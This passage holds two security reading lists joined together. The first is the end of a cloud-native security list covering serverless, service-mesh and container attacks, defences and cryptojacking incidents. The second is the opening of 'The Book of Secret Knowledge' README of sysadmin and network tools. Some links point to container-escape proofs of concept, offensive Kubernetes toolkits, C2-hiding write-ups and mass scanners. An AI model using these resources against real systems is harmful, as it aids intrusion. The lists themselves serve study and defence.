- [Serverless Red Team Infrastructure: Part 1, Web Bugs (2018-09)](https://www.mdsec.co.uk/2018/09/serverless-red-team-infrastructure-part-1-web-bugs/)
- [针对AWS Lambda的运行时攻击 (2020-12-02)](https://mp.weixin.qq.com/s?__biz=MzIyODYzNTU2OA==&mid=2247488901&idx=1&sn=4d7bdb1ddf015cb77ea4e8bc0978712f&chksm=e84fb35adf383a4ca9e9b7cb0dce91cf757e043d74201361537aa6cd0e80cf6afaf1c63eb1e5&mpshare=1&scene=1&srcid=0331LaY4vmtzqLyDuZ41Y8GB&sharer_sharetime=1617201942068&sharer_shareid=353a216cfe47b39b5c642fc1dbddb3ef&version=3.1.0.2353&platform=mac#rd)
- [How We Escaped Docker in Azure Functions (2021-01-27)](https://www.intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/)
- [Royal Flush: Privilege Escalation Vulnerability in Azure Functions (2021-04-08)](https://www.intezer.com/blog/cloud-security/royal-flush-privilege-escalation-vulnerability-in-azure-functions/)
- [RT又玩新套路,竟然这样隐藏C2 (2021-04-21)](https://mp.weixin.qq.com/s/ouvfGPnkFs2C_FCKO5Q_sQ)
- [CDN+FaaS打造攻击前置 (2021-08-11)](https://mp.weixin.qq.com/s/6SAgy16Uja42GksLJdRHOg)
### 1.6 Service Mesh
- [A Survey of Istio’s Network Security Features (2020-03-04)](https://research.nccgroup.com/2020/03/04/a-survey-of-istios-network-security-features/)
- [Istio访问授权再曝高危漏洞 (CVE-2020-8595, 2020-03-13)](https://mp.weixin.qq.com/s/IHJAsO2SktNXqQGNLuTYUQ)
- [Attack in a Service Mesh (CIS 2020)](https://github.com/neargle/slidefiles/blob/main/2020%20CIS%20-%20Attack%20in%20a%20Service%20Mesh%20-%20Public.pptx.pdf)
- [Istio Security Assessment (2021-07-13 (disclosed), 2020-08-06 (accomplished) by Istio with NCC Group)](https://istio.io/latest/blog/2021/ncc-security-assessment/NCC_Group_Google_GOIST2005_Report_2020-08-06_v1.1.pdf)
### 1.7 API Gateway
- [腾讯蓝军安全提醒:开源云原生API网关Kong可能会成为攻击方进入企业内网的新入口(CVE-2020-11710) (2020-04-15)](https://security.tencent.com/index.php/announcement/msg/193)
### 1.8 Windows Containers
- [Well, That Escalated Quickly! How Abusing Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in The Hypervisor via Shadow Containers (Black Hat 2017)](https://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence.pdf)
- [Well, That Escalated Quickly! (Whitepaper)](https://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf)
- [What I Learned from Reverse Engineering Windows Containers (2019-12-12)](https://unit42.paloaltonetworks.com/what-i-learned-from-reverse-engineering-windows-containers/)
- [Windows Server Containers Are Open, and Here's How You Can Break Out (2020-07-15)](https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/)
- [PoC by James Forshaw (the author of post *Who Contains the Containers?*)](https://gist.github.com/tyranid/bf8a890e615d310c7193901a1c7e0e3a)
- [Who Contains the Containers? (Project Zero, 2021-04-01)](https://googleprojectzero.blogspot.com/2021/04/who-contains-containers.html)
### 1.9 Tools
- [kube-hunter - Hunt for security weaknesses in Kubernetes clusters](https://github.com/aquasecurity/kube-hunter)
- [serverless_toolkit - A collection of useful Serverless functions I use when pentesting](https://github.com/ropnop/serverless_toolkit)
- [kubesploit](https://github.com/cyberark/kubesploit)
- [kubeletmein - Security testing tool for Kubernetes, abusing kubelet credentials on public cloud providers](https://github.com/4ARMED/kubeletmein)
- [CDK - Zero Dependency Container Penetration Toolkit](https://github.com/cdk-team/CDK)
- [Zero Dependency Container Penetration Toolkit (Blackhat 2021)](https://github.com/neargle/slidefiles/blob/main/2021%20BlackHat%20ASIA%20Arsenal%20-%20Zero%20Dependency%20Container%20Penetration%20Toolkit.pdf)
- [CDK: Also a Awesome BugBounty Tool for Cloud Platform (WHC 2021)](https://github.com/neargle/slidefiles/blob/main/2021%20WHC2021%20CDK-Also-a-Awesome-BugBounty-Tool-for-Cloud-Platform.pptx.pdf)
- [Metarget - framework providing automatic constructions of vulnerable infrastructures](https://github.com/brant-ruan/metarget)
- [red-kube - Red Team K8S Adversary Emulation Based on kubectl](https://github.com/lightspin-tech/red-kube)
- [whoc - A container image that extracts the underlying container runtime](https://github.com/twistlock/whoc)
- [kdigger - A context discovery tool for Kubernetes penetration testing](https://github.com/quarkslab/kdigger)
- [Introduction to kdigger](https://blog.quarkslab.com/kdigger-a-context-discovery-tool-for-kubernetes.html)
## 2 Defensive
### 2.1 Standards and Benchmarks
- [NIST.SP.800-190 Application Container Security Guide (2017-09-25)](https://csrc.nist.gov/publications/detail/sp/800-190/final)
- [NIST.IR.8176 Security Assurance Requirements for Linux Application Container Deployments (2017-10)](https://nvlpubs.nist.gov/nistpubs/ir/2017/NIST.IR.8176.pdf)
- [OWASP Container Security Verification Standard](https://github.com/OWASP/Container-Security-Verification-Standard)
- [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/)
- [CIS Docker Benchmark](https://www.cisecurity.org/benchmark/docker/)
- [NIST.SP.800-204 Security Strategies for Microservices-based Application Systems (2019-08)](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-204.pdf)
- [NIST.SP.800-204B Attribute-based Access Control for Microservices-based Applications Using a Service Mesh (2021-08)](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-204B.pdf)
### 2.2 Kubernetes
- [Kubernetes中的异常活动检测 (KCon 2021)](https://github.com/knownsec/KCon/blob/master/2021/kubernetes中的异常活动检测.pdf)
### 2.3 Container
- [Understanding and Hardening Linux Containers (2016-06-29)](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc_group_understanding_hardening_linux_containers-1-1.pdf)
- [探索Sysdig Falco:容器环境下的异常行为检测工具 (2019-09-25)](https://wohin.me/tan-suo-sysdig-falco-rong-qi-huan-jing-xia-de-yi-chang-xing-wei-jian-ce-gong-ju/)
- [云原生之容器安全实践 (2020-03-12)](https://tech.meituan.com/2020/03/12/cloud-native-security.html)
- [容器环境相关的内核漏洞缓解技术 (2020-08-31)](https://mp.weixin.qq.com/s?__biz=MzIyODYzNTU2OA==&mid=2247488536&idx=1&sn=fd2fcb732e76b2243f972f7a79be2b19)
- [Detecting a Container Escape with Cilium and eBPF](https://isovalent.com/blog/post/2021-11-container-escape)
### 2.4 Secure Container
- [Making Containers More Isolated: An Overview of Sandboxed Container Technologies (2019-06-06)](https://unit42.paloaltonetworks.com/making-containers-more-isolated-an-overview-of-sandboxed-container-technologies/)
- [深度解析 AWS Firecracker 原理篇 – 虚拟化与容器运行时技术 (2019-12-09)](https://aws.amazon.com/cn/blogs/china/deep-analysis-aws-firecracker-principle-virtualization-container-runtime-technology/)
- [以Docker为代表的传统容器到了生死存亡之际 (2019-12-24)](https://mp.weixin.qq.com/s/3OkDCNdwumIP9qj_FS_Kzg)
- [Kata Containers创始人:安全容器导论 (2019-12-26)](https://mp.weixin.qq.com/s?__biz=MzI0Nzc3MTQyMw==&mid=2247490237&idx=1&sn=eebe19ed1f693400cbad9b6e91b5dfb4&chksm=e9aba2cddedc2bdbae69c61f49b014f95052f377daa65f7522dbae92fe5fde62edecd70a7eca&token=347966226&lang=zh_CN#rd)
### 2.5 Network
- [BASTION: A Security Enforcement Network Stack for Container Networks (USENIX 2020)](https://www.usenix.org/system/files/atc20-nam.pdf)
### 2.6 Practices
- [国外顶尖容器安全产品是怎么做的 (2020-12-04)](https://mp.weixin.qq.com/s/JypEOt3N0li9l1KToToHZA)
- [云原生|容器和应用安全运营实践思考 (2021-09-07)](https://mp.weixin.qq.com/s/rRJLW5ZaecEjnLIWjQqs9g)
### 2.7 Tools
- [docker-bench-security](https://github.com/docker/docker-bench-security)
- [kube-bench](https://github.com/aquasecurity/kube-bench)
- [KubiScan](https://github.com/cyberark/KubiScan)
- [Falco](https://github.com/falcosecurity/falco)
- [Bypass Falco (2020-11-20)](https://static.sched.com/hosted_files/kccncna20/56/Bypass%20Falco%20%5BKubeCon%20%2B%20CloudNativeCon%20NA%202020%5D.pdf)
- [Detecting MITRE ATT&CK: Defense evasion techniques with Falco (2021-02-02)](https://sysdig.com/blog/mitre-defense-evasion-falco/)
- [Detecting MITRE ATT&CK: Privilege escalation with Falco (2021-03-02)](https://sysdig.com/blog/mitre-privilege-escalation-falco/)
- [Elkeid - Elkeid is a Cloud-Native Host-Based Intrusion Detection solution project to provide next-generation Threat Detection and Behavior Audition with modern architecture](https://github.com/bytedance/Elkeid)
- [kubescape - kubescape is the first tool for testing if Kubernetes is deployed securely as defined in Kubernetes Hardening Guidance by to NSA and CISA](https://github.com/armosec/kubescape)
- [veinmind-tools](https://github.com/chaitin/veinmind-tools)
- [cnspec - cloud-native security and policy project](https://cnspec.io)
## 3 Incidents
- [Lessons from the Cryptojacking Attack at Tesla (2018-02-20)](https://web.archive.org/web/20180222103919/https://blog.redlock.io/cryptojacking-tesla)
- [Graboid: First-Ever Cryptojacking Worm Found in Images on Docker Hub (2019-10-15)](https://unit42.paloaltonetworks.com/graboid-first-ever-cryptojacking-worm-found-in-images-on-docker-hub/)
- [Detect large-scale cryptocurrency mining attack against Kubernetes clusters (2020-04-08)](https://azure.microsoft.com/en-us/blog/detect-largescale-cryptocurrency-mining-attack-against-kubernetes-clusters/)
- [Coinminer, DDoS Bot Attack Docker Daemon Ports (2020-05-06)](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/coinminer-ddos-bot-attack-docker-daemon-ports)
- [TeamTNT团伙对Docker主机发起攻击活动,植入挖矿木马 (2020-08-04)](https://mp.weixin.qq.com/s?__biz=MzI5NjA0NjI5MQ==&mid=2650166823&idx=1&sn=4bb43461b3159a2ef8ff21d244dc10ed)
- [Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials (2020-08-16)](https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/)
- [Cetus: Cryptojacking Worm Targeting Docker Daemons (2020-08-27)](https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/)
- [Black-T: New Cryptojacking Variant from TeamTNT (2020-10-05)](https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/)
- [TeamTNT 挖矿木马利用Docker Remote API未授权访问漏洞入侵云服务器 (2020-11-27)](https://s.tencent.com/research/report/1185.html)
- [TeamTNT Now Deploying DDoS-Capable IRC Bot TNTbotinger (2020-12-18)](https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html)
- [Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes (2021-02-03)](https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/)
- [TeamTNT Targets Kubernetes, Nearly 50,000 IPs Compromised in Worm-like Attack (2021-05-25)](https://www.trendmicro.com/en_nl/research/21/e/teamtnt-targets-kubernetes--nearly-50-000-ips-compromised.html)
- [Tracking the Activities of TeamTNT: A Closer Look at a Cloud-Focused Malicious Actor Group (2021-06)](https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf)
- [TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations (2021-06-04)](https://unit42.paloaltonetworks.com/teamtnt-operations-cloud-environments/)
- [TeamTNT with new campaign aka "Chimaera" (2021-09-08)](https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera)
- [Team TNT Deploys Malicious Docker Image On Docker Hub (2021-10-07)](https://www.uptycs.com/blog/team-tnt-deploys-malicious-docker-image-on-docker-hub-with-pentesting-tools)
- [再次捕获云上在野容器攻击,TeamTNT黑产攻击方法揭秘 (2021-10-20)](https://mp.weixin.qq.com/s/9ZSxpeUHTcgQrQ1Ys5uROw)
- [Compromised Docker Hub Accounts Abused for Cryptomining Linked to TeamTNT (2021-11-09)](https://www.trendmicro.com/en_us/research/21/k/compromised-docker-hub-accounts-abused-for-cryptomining-linked-t.html)
- [Misconfigured Kubeflow workloads are a security risk (2020-06-10)](https://www.microsoft.com/security/blog/2020/06/10/misconfigured-kubeflow-workloads-are-a-security-risk/)
- [鉴权配置不当,蠕虫在自建K8s集群自由出入 (2020-09-16)](https://developer.aliyun.com/article/772455)
- [Siloscape: First Known Malware Targeting Windows Containers to Compromise Cloud Environments (2021-06-07)](https://unit42.paloaltonetworks.com/siloscape/)
- [NSA, Partners Release Cybersecurity Advisory on Brute Force Global Cyber Campaign (2021-07-01)](https://www.nsa.gov/news-features/press-room/Article/2677750/nsa-partners-release-cybersecurity-advisory-on-brute-force-global-cyber-campaign/)
- [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments (2021-07)](https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF)
- [DockerHub再现百万下载量黑产镜像,小心你的容器被挖矿 (2021-08-30)](https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247490656&idx=1&sn=8d86694b96f7c78aaba149bc123b620f)
- [Misconfigured Kafdrop Puts Companies’ Apache Kafka Completely Exposed (2021-12-06)](https://spectralops.io/blog/misconfigured-kafdrop-puts-companies-apache-kafka-completely-exposed/)
|
<p align="center">
<a href="https://github.com/trimstray/the-book-of-secret-knowledge">
<img src="https://github.com/trimstray/the-book-of-secret-knowledge/blob/master/static/img/the-book-of-secret-knowledge-preview.png" alt="Master">
</a>
</p>
<p align="center">"<i>Knowledge is powerful, be careful how you use it!</i>"</p>
<h4 align="center">A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools, and more.</h4>
<br>
<p align="center">
<a href="https://github.com/trimstray/the-book-of-secret-knowledge/pulls">
<img src="https://img.shields.io/badge/PRs-welcome-brightgreen.svg?longCache=true" alt="Pull Requests">
</a>
<a href="LICENSE.md">
<img src="https://img.shields.io/badge/License-MIT-lightgrey.svg?longCache=true" alt="MIT License">
</a>
</p>
<p align="center">
<a href="https://twitter.com/trimstray" target="_blank">
<img src="https://img.shields.io/twitter/follow/trimstray.svg?logo=twitter">
</a>
</p>
<div align="center">
<sub>Created by
<a href="https://twitter.com/trimstray">trimstray</a> and
<a href="https://github.com/trimstray/the-book-of-secret-knowledge/graphs/contributors">contributors</a>
</div>
<br>
****
## :notebook_with_decorative_cover: What is it?
This repository is a collection of various materials and tools that I use every day in my work. It contains a lot of useful information gathered in one piece. It is an invaluable source of knowledge for me that I often look back on.
## :restroom: For whom?
For everyone, really. Here everyone can find their favourite tastes. But to be perfectly honest, it is aimed towards System and Network administrators, DevOps, Pentesters, and Security Researchers.
## :information_source: Contributing
If you find something which doesn't make sense, or something doesn't seem right, please make a pull request and please add valid and well-reasoned explanations about your changes or comments.
A few simple rules for this project:
- inviting and clear
- not tiring
- useful
These below rules may be better:
- easy to contribute to (Markdown + HTML ...)
- easy to find (simple TOC, maybe it's worth extending them?)
Url marked **\*** is temporary unavailable. Please don't delete it without confirming that it has permanently expired.
Before adding a pull request, please see the **[contributing guidelines](.github/CONTRIBUTING.md)**. You should also remember about this:
```diff
+ This repository is not meant to contain everything but only good quality stuff.
```
All **suggestions/PR** are welcome!
### Code Contributors
This project exists thanks to all the people who contribute.
<a href="https://github.com/trimstray/the-book-of-secret-knowledge/graphs/contributors"><img src="https://opencollective.com/the-book-of-secret-knowledge/contributors.svg?width=890&button=false"></a>
### Financial Contributors
<p align="left">
<a href="https://opencollective.com/the-book-of-secret-knowledge" alt="Financial Contributors on Open Collective">
<img src="https://img.shields.io/opencollective/backers/the-book-of-secret-knowledge?style=for-the-badge&color=FF4500&labelColor=A9A9A9"></a>
</a>
<a href="https://opencollective.com/the-book-of-secret-knowledge" alt="Financial Contributors on Open Collective">
<img src="https://img.shields.io/opencollective/sponsors/the-book-of-secret-knowledge?style=for-the-badge&color=FF4500&labelColor=A9A9A9"></a>
</a>
</p>
## :newspaper: RSS Feed & Updates
GitHub exposes an [RSS/Atom](https://github.com/trimstray/the-book-of-secret-knowledge/commits.atom) feed of the commits, which may also be useful if you want to be kept informed about all changes.
## :ballot_box_with_check: ToDo
- [ ] Add new stuff...
- [ ] Add useful shell functions
- [ ] Add one-liners for collection tools (eg. CLI Tools)
- [ ] Sort order in lists
New items are also added on a regular basis.
## :anger: Table of Contents
Only main chapters:
- **[CLI Tools](#cli-tools-toc)**
- **[GUI Tools](#gui-tools-toc)**
- **[Web Tools](#web-tools-toc)**
- **[Systems/Services](#systemsservices-toc)**
- **[Networks](#networks-toc)**
- **[Containers/Orchestration](#containersorchestration-toc)**
- **[Manuals/Howtos/Tutorials](#manualshowtostutorials-toc)**
- **[Inspiring Lists](#inspiring-lists-toc)**
- **[Blogs/Podcasts/Videos](#blogspodcastsvideos-toc)**
- **[Hacking/Penetration Testing](#hackingpenetration-testing-toc)**
- **[Your daily knowledge and news](#your-daily-knowledge-and-news-toc)**
- **[Other Cheat Sheets](#other-cheat-sheets-toc)**
- **[One-liners](#one-liners-toc)**
- **[Shell functions](#shell-functions-toc)**
## :trident: The Book of Secret Knowledge (Chapters)
#### CLI Tools [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Shells
<p>
:small_orange_diamond: <a href="https://www.gnu.org/software/bash/"><b>GNU Bash</b></a> - is an sh-compatible shell that incorporates useful features from the Korn shell and C shell.<br>
:small_orange_diamond: <a href="https://www.zsh.org/"><b>Zsh</b></a> - is a shell designed for interactive use, although it is also a powerful scripting language.<br>
:small_orange_diamond: <a href="https://tcl-lang.org/"><b>tclsh</b></a> - is a very powerful cross-platform shell, suitable for a huge range of uses.<br>
:small_orange_diamond: <a href="https://github.com/Bash-it/bash-it"><b>bash-it</b></a> - is a framework for using, developing and maintaining shell scripts and custom commands.<br>
:small_orange_diamond: <a href="https://ohmyz.sh/"><b>Oh My ZSH!</b></a> - is the best framework for managing your Zsh configuration.<br>
:small_orange_diamond: <a href="https://github.com/oh-my-fish/oh-my-fish"><b>Oh My Fish</b></a> - the Fishshell framework.<br>
:small_orange_diamond: <a href="https://github.com/starship/starship"><b>Starship</b></a> - the cross-shell prompt written in Rust.<br>
:small_orange_diamond: <a href="https://github.com/romkatv/powerlevel10k"><b>powerlevel10k</b></a> - is a fast reimplementation of Powerlevel9k ZSH theme.<br>
</p>
##### :black_small_square: Shell plugins
<p>
:small_orange_diamond: <a href="https://github.com/rupa/z"><b>z</b></a> - tracks the folder you use the most and allow you to jump, without having to type the whole path.<br>
:small_orange_diamond: <a href="https://github.com/junegunn/fzf"><b>fzf</b></a> - is a general-purpose command-line fuzzy finder.<br>
:small_orange_diamond: <a href="https://github.com/zsh-users/zsh-autosuggestions"><b>zsh-autosuggestions</b></a> - Fish-like autosuggestions for Zsh.<br>
:small_orange_diamond: <a href="https://github.com/zsh-users/zsh-syntax-highlighting"><b>zsh-syntax-highlighting</b></a> - Fish shell like syntax highlighting for Zsh.<br>
:small_orange_diamond: <a href="https://github.com/unixorn/awesome-zsh-plugins"><b>Awesome ZSH Plugins</b></a> - A list of frameworks, plugins, themes and tutorials for ZSH.<br>
</p>
##### :black_small_square: Managers
<p>
:small_orange_diamond: <a href="https://midnight-commander.org/"><b>Midnight Commander</b></a> - is a visual file manager, licensed under GNU General Public License.<br>
:small_orange_diamond: <a href="https://github.com/ranger/ranger"><b>ranger</b></a> - is a VIM-inspired filemanager for the console.<br>
:small_orange_diamond: <a href="https://github.com/jarun/nnn"><b>nnn</b></a> - is a tiny, lightning fast, feature-packed file manager.<br>
:small_orange_diamond: <a href="https://www.gnu.org/software/screen/"><b>screen</b></a> - is a full-screen window manager that multiplexes a physical terminal.<br>
:small_orange_diamond: <a href="https://github.com/tmux/tmux/wiki"><b>tmux</b></a> - is a terminal multiplexer, lets you switch easily between several programs in one terminal.<br>
:small_orange_diamond: <a href="https://github.com/peikk0/tmux-cssh"><b>tmux-cssh</b></a> - is a tool to set comfortable and easy to use functionality, clustering and synchronizing tmux-sessions.<br>
</p>
##### :black_small_square: Text editors
<p>
:small_orange_diamond: <a href="http://ex-vi.sourceforge.net/"><b>vi</b></a> - is one of the most common text editors on Unix.<br>
:small_orange_diamond: <a href="https://www.vim.org/"><b>vim</b></a> - is a highly configurable text editor.<br>
:small_orange_diamond: <a href="https://www.gnu.org/software/emacs/"><b>emacs</b></a> - is an extensible, customizable, free/libre text editor, and more.<br>
:small_orange_diamond: <a href="https://github.com/zyedidia/micro"><b>micro</b></a> - is a modern and intuitive terminal-based text editor.<br>
:small_orange_diamond: <a href="https://neovim.io/"><b>neovim</b></a> - is a free open source, powerful, extensible and usable code editor.<br>
:small_orange_diamond: <a href="https://www.spacemacs.org/"><b>spacemacs</b></a> - a community-driven Emacs distribution.<br>
:small_orange_diamond: <a href="https://spacevim.org/"><b>spacevim</b></a> - a community-driven vim distribution.<br>
</p>
##### :black_small_square: Files and directories
<p>
:small_orange_diamond: <a href="https://github.com/sharkdp/fd"><b>fd</b></a> - is a simple, fast and user-friendly alternative to find.<br>
:small_orange_diamond: <a href="https://dev.yorhel.nl/ncdu"><b>ncdu</b></a> - is an easy to use, fast disk usage analyzer.<br>
</p>
##### :black_small_square: Network
<p>
:small_orange_diamond: <a href="https://www.putty.org/"><b>PuTTY</b></a> - is an SSH and telnet client, developed originally by Simon Tatham.<br>
:small_orange_diamond: <a href="https://mosh.org/"><b>Mosh</b></a> - is a SSH wrapper designed to keep a SSH session alive over a volatile connection.<br>
:small_orange_diamond: <a href="https://eternalterminal.dev/"><b>Eternal Terminal</b></a> - enables mouse-scrolling and tmux commands inside the SSH session.<br>
:small_orange_diamond: <a href="https://nmap.org/"><b>nmap</b></a> - is a free and open source (license) utility for network discovery and security auditing.<br>
:small_orange_diamond: <a href="https://github.com/zmap/zmap"><b>zmap</b></a> - is a fast single packet network scanner designed for Internet-wide network surveys.<br>
:small_orange_diamond: <a href="https://github.com/RustScan/RustScan"><b>Rust Scan</b></a> - to find all open ports faster than Nmap.<br>
:small_orange_diamond: <a href="https://github.com/robertdavidgraham/masscan"><b>masscan</b></a> - is the fastest Internet port scanner, spews SYN packets asynchronously.<br>
:small_orange_diamond: <a href="https://github.com/gvb84/pbscan"><b>pbscan</b></a> - is a faster and more efficient stateless SYN scanner and banner grabber.<br>
:small_orange_diamond: <a href="http://www.hping.org/"><b>hping</b></a> - is a command-line oriented TCP/IP packet assembler/analyzer.<br>
:small_orange_diamond: <a href="https://github.com/traviscross/mtr"><b>mtr</b></a> - is a tool that combines the functionality of the 'traceroute' and 'ping' programs in a single tool.<br>
:small_orange_diamond: <a href="https://github.com/mehrdadrad/mylg"><b>mylg</b></a> - utility which combines the functions of the different network probes in one diagnostic tool.<br>
:small_orange_diamond: <a href="http://netcat.sourceforge.net/"><b>netcat</b></a> - utility which reads and writes data across network connections, using the TCP/IP protocol.<br>
:small_orange_diamond: <a href="https://www.tcpdump.org/"><b>tcpdump</b></a> - is a powerful command-line packet analyzer.<br>
:small_orange_diamond: <a href="https://www.wireshark.org/docs/man-pages/tshark.html"><b>tshark</b></a> - is a tool that allows us to dump and analyze network traffic (wireshark cli).<br>
:small_orange_diamond: <a href="https://termshark.io/"><b>Termshark</b></a> - is a simple terminal user-interface for tshark.<br>
:small_orange_diamond: <a href="https://github.com/jpr5/ngrep"><b>ngrep</b></a> - is like GNU grep applied to the network layer.<br>
:small_orange_diamond: <a href="http://netsniff-ng.org/"><b>netsniff-ng</b></a> - is a Swiss army knife for your daily Linux network plumbing if you will.<br>
:small_orange_diamond: <a href="https://github.com/mechpen/sockdump"><b>sockdump</b></a> - dump unix domain socket traffic.<br>
:small_orange_diamond: <a href="https://github.com/google/stenographer"><b>stenographer</b></a> - is a packet capture solution which aims to quickly spool all packets to disk.<br>
:small_orange_diamond: <a href="https://github.com/sachaos/tcpterm"><b>tcpterm</b></a> - visualize packets in TUI.<br>
:small_orange_diamond: <a href="https://github.com/tgraf/bmon"><b>bmon</b></a> - is a monitoring and debugging tool to capture networking related statistics and prepare them visually.<br>
:small_orange_diamond: <a href="http://iptraf.seul.org/2.6/manual.html#installation"><b>iptraf-ng</b></a> - is a console-based network monitoring program for Linux that displays information about IP traffic.<br>
:small_orange_diamond: <a href="https://github.com/vergoh/vnstat"><b>vnstat</b></a> - is a network traffic monitor for Linux and BSD.<br>
:small_orange_diamond: <a href="https://iperf.fr/"><b>iPerf3</b></a> - is a tool for active measurements of the maximum achievable bandwidth on IP networks.<br>
:small_orange_diamond: <a href="https://github.com/Microsoft/Ethr"><b>ethr</b></a> - is a Network Performance Measurement Tool for TCP, UDP & HTTP.<br>
:small_orange_diamond: <a href="https://github.com/jwbensley/Etherate"><b>Etherate</b></a> - is a Linux CLI based Ethernet and MPLS traffic testing tool.<br>
:small_orange_diamond: <a href="https://github.com/mpolden/echoip"><b>echoip</b></a> - is a IP address lookup service.<br>
:small_orange_diamond: <a href="https://github.com/troglobit/nemesis"><b>Nemesis</b></a> - packet manipulation CLI tool; craft and inject packets of several protocols.<br>
:small_orange_diamond: <a href="https://github.com/packetfu/packetfu"><b>packetfu</b></a> - a mid-level packet manipulation library for Ruby.<br>
:small_orange_diamond: <a href="https://scapy.net/"><b>Scapy</b></a> - packet manipulation library; forge, send, decode, capture packets of a wide number of protocols.<br>
:small_orange_diamond: <a href="https://github.com/SecureAuthCorp/impacket"><b>impacket</b></a> - is a collection of Python classes for working with network protocols.<br>
:small_orange_diamond: <a href="https://github.com/arthepsy/ssh-audit"><b>ssh-audit</b></a> - is a tool for SSH server auditing.<br>
:small_orange_diamond: <a href="https://aria2.github.io/"><b>aria2</b></a> - is a lightweight multi-protocol & multi-source command-line download utility.<br>
:small_orange_diamond: <a href="https://github.com/x-way/iptables-tracer"><b>iptables-tracer</b></a> - observe the path of packets through the iptables chains.<br>
:small_orange_diamond: <a href="https://github.com/proabiral/inception"><b>inception</b></a> - a highly configurable tool to check for whatever you like against any number of hosts.<br>
</p>
##### :black_small_square: Network (DNS)
<p>
:small_orange_diamond: <a href="https://github.com/farrokhi/dnsdiag"><b>dnsdiag</b></a> - is a DNS diagnostics and performance measurement tools.<br>
:small_orange_diamond: <a href="https://github.com/mschwager/fierce"><b>fierce</b></a> - is a DNS reconnaissance tool for locating non-contiguous IP space.<br>
:small_orange_diamond: <a href="https://github.com/subfinder/subfinder"><b>subfinder</b></a> - is a subdomain discovery tool that discovers valid subdomains for websites.<br>
:small_orange_diamond: <a href="https://github.com/aboul3la/Sublist3r"><b>sublist3r</b></a> - is a fast subdomains enumeration tool for penetration testers.<br>
:small_orange_diamond: <a href="https://github.com/OWASP/Amass"><b>amass</b></a> - is tool that obtains subdomain names by scraping data sources, crawling web archives, and more.<br>
:small_orange_diamond: <a href="https://github.com/google/namebench"><b>namebench</b></a> - provides personalized DNS server recommendations based on your browsing history.<br>
:small_orange_diamond: <a href="https://github.com/blechschmidt/massdns"><b>massdns</b></a> - is a high-performance DNS stub resolver for bulk lookups and reconnaissance.<br>
:small_orange_diamond: <a href="https://github.com/guelfoweb/knock"><b>knock</b></a> - is a tool to enumerate subdomains on a target domain through a wordlist.<br>
:small_orange_diamond: <a href="https://github.com/DNS-OARC/dnsperf"><b>dnsperf</b></a> - DNS performance testing tools.<br>
:small_orange_diamond: <a href="https://github.com/jedisct1/dnscrypt-proxy"><b>dnscrypt-proxy 2</b></a> - a flexible DNS proxy, with support for encrypted DNS protocols.<br>
:small_orange_diamond: <a href="https://github.com/dnsdb/dnsdbq"><b>dnsdbq</b></a> - API client providing access to passive DNS database systems.<br>
:small_orange_diamond: <a href="https://github.com/looterz/grimd"><b>grimd</b></a> - fast dns proxy, built to black-hole internet advertisements and malware servers.<br>
</p>
##### :black_small_square: Network (HTTP)
<p>
:small_orange_diamond: <a href="https://curl.haxx.se/"><b>curl</b></a> - is a command line tool and library for transferring data with URLs.<br>
:small_orange_diamond: <a href="https://gitlab.com/davidjpeacock/kurly"><b>kurly</b></a> - is an alternative to the widely popular curl program, written in Golang.<br>
:small_orange_diamond: <a href="https://github.com/jakubroztocil/httpie"><b>HTTPie</b></a> - is an user-friendly HTTP client.<br>
:small_orange_diamond: <a href="https://github.com/asciimoo/wuzz"><b>wuzz</b></a> - is an interactive cli tool for HTTP inspection.<br>
:small_orange_diamond: <a href="https://github.com/summerwind/h2spec"><b>h2spec</b></a> - is a conformance testing tool for HTTP/2 implementation.<br>
:small_orange_diamond: <a href="https://github.com/gildasio/h2t"><b>h2t</b></a> - is a simple tool to help sysadmins to hardening their websites.<br>
:small_orange_diamond: <a href="https://github.com/trimstray/htrace.sh"><b>htrace.sh</b></a> - is a simple Swiss Army knife for http/https troubleshooting and profiling.<br>
:small_orange_diamond: <a href="https://github.com/reorx/httpstat"><b>httpstat</b></a> - is a tool that visualizes curl statistics in a way of beauty and clarity.<br>
:small_orange_diamond: <a href="https://github.com/gchaincl/httplab"><b>httplab</b></a> - is an interactive web server.<br>
:small_orange_diamond: <a href="https://lynx.browser.org/"><b>Lynx</b></a> - is a text browser for the World Wide Web.<br>
:small_orange_diamond: <a href="https://github.com/browsh-org/browsh/"><b>Browsh</b></a> - is a fully interactive, real-time, and modern text-based browser.<br>
:small_orange_diamond: <a href="https://github.com/dhamaniasad/HeadlessBrowsers"><b>HeadlessBrowsers</b></a> - a list of (almost) all headless web browsers in existence.<br>
:small_orange_diamond: <a href="https://httpd.apache.org/docs/2.4/programs/ab.html"><b>ab</b></a> - is a single-threaded command line tool for measuring the performance of HTTP web servers.<br>
